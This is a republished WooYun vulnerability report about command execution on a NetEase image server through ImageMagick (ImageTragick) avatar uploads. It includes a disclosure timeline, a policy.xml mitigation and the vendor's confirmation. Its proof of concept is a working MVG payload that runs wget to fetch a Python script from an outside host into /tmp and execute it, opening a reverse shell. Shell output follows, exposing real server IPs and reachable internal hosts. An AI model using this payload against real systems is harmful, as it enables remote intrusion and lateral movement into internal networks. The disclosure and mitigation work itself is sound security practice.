网易某图片服务器命令执行(已入内网)

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-05-06: 细节已通知厂商并且等待厂商处理中
2016-05-09: 厂商已经确认,细节仅向厂商公开
2016-05-19: 细节向核心白帽子及相关领域专家公开
2016-05-29: 细节向普通白帽子公开
2016-06-08: 细节向实习白帽子公开
2016-06-23: 细节向公众公开

简要描述:

老套路

详细说明:

http://bbs.163.com/user



注册后修改个人资料上传图像



上传图片内容

code 区域
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|wget 115.2***02/back.py -O /tmp/x.py && python /tmp/x.py 1***2 2333")'
pop graphic-context





sh-4.0# uname -a

uname -a

Linux t-datanode-0 2.6.30-1-686 #1 SMP Mon Aug 3 16:18:30 UTC 2009 i686 GNU/Linux







sh-4.0# ifconfig

ifconfig

eth0 Link encap:Ethernet HWaddr 00:11:43:e0:26:f0

inet addr:220.181.29.230 Bcast:220.181.29.255 Mask:255.255.255.0

inet6 addr: fe80::211:43ff:fee0:26f0/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:2562477857 errors:107 dropped:0 overruns:0 frame:54

TX packets:37642479 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:4144008110 (3.8 GiB) TX bytes:4002831724 (3.7 GiB)



eth1 Link encap:Ethernet HWaddr 00:11:43:e0:26:f1

inet addr:192.168.51.230 Bcast:192.168.51.255 Mask:255.255.255.0

inet6 addr: fe80::211:43ff:fee0:26f1/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:653650493 errors:221 dropped:0 overruns:0 frame:111

TX packets:464030411 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:2474372533 (2.3 GiB) TX bytes:3341586467 (3.1 GiB)



lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

inet6 addr: ::1/128 Scope:Host

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:1683512 errors:0 dropped:0 overruns:0 frame:0

TX packets:1683512 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:127026347 (121.1 MiB) TX bytes:127026347 (121.1 MiB)

漏洞证明:

sh-4.0# ping 10.100.21.249

ping 10.100.21.249

PING 10.100.21.249 (10.100.21.249) 56(84) bytes of data.

64 bytes from 10.100.21.249: icmp_seq=1 ttl=253 time=0.810 ms

64 bytes from 10.100.21.249: icmp_seq=2 ttl=253 time=0.755 ms

64 bytes from 10.100.21.249: icmp_seq=3 ttl=253 time=0.827 ms

64 bytes from 10.100.21.249: icmp_seq=4 ttl=253 time=0.785 ms

64 bytes from 10.100.21.249: icmp_seq=5 ttl=253 time=0.838 ms

修复方案:

官方在6.9.3-9版本中对漏洞进行了不完全的修复



使用policy file来防御这个漏洞,这个文件默认位置在 /etc/ImageMagick/policy.xml ,我们通过配置如下的xml来禁止解析https等敏感操作:





<policymap>

<policy domain="coder" rights="none" pattern="EPHEMERAL" />

<policy domain="coder" rights="none" pattern="URL" />

<policy domain="coder" rights="none" pattern="HTTPS" />

<policy domain="coder" rights="none" pattern="MVG" />

<policy domain="coder" rights="none" pattern="MSL" />

</policymap>

版权声明:转载请注明来源 jianFen@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-09 16:00

厂商回复:

漏洞已修复,感谢您对网易的关注!

最新状态:

暂无


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度已收录『查看详情』

本文链接:网易某图片服务器命令执行(已入内网) - https://www.15qq.cn/wooyun/548.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知